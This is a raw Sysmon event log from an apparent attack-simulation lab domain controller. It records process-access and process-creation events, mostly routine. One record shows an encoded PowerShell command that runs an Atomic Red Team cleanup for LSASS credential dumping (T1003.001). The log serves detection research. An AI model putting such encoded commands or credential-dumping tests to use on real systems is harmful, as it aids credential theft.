10341000x80000000000000006005Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.975{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006004Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.975{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006003Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.975{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006002Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.975{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006001Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.975{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006000Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.975{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005999Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.975{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005998Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.975{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005997Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.975{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-4501-000000008801}3092C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005996Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.975{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE1-5FA1-4501-000000008801}3092C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31a632ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f04137(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f03e08(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319b546d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ec499e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f22e6d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f06363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ef82e8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f0481b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f043b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f04137(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f03e08(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319b546d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ec499e(wow64) 154100x80000000000000005995Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.978{D28789B6-7CE1-5FA1-4501-000000008801}3092C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbABlAGEAbgB1AHAA 10341000x80000000000000005994Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.960{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-4401-000000008801}888C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005993Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.960{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005992Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.960{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005991Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.960{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005990Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.960{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005989Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.960{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005988Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.960{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005987Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.960{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005986Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.960{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005985Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.960{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005984Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.960{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-4401-000000008801}888C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005983Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.960{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE1-5FA1-4401-000000008801}888C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31a632ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f04137(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f03e08(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319b546d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ec499e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_6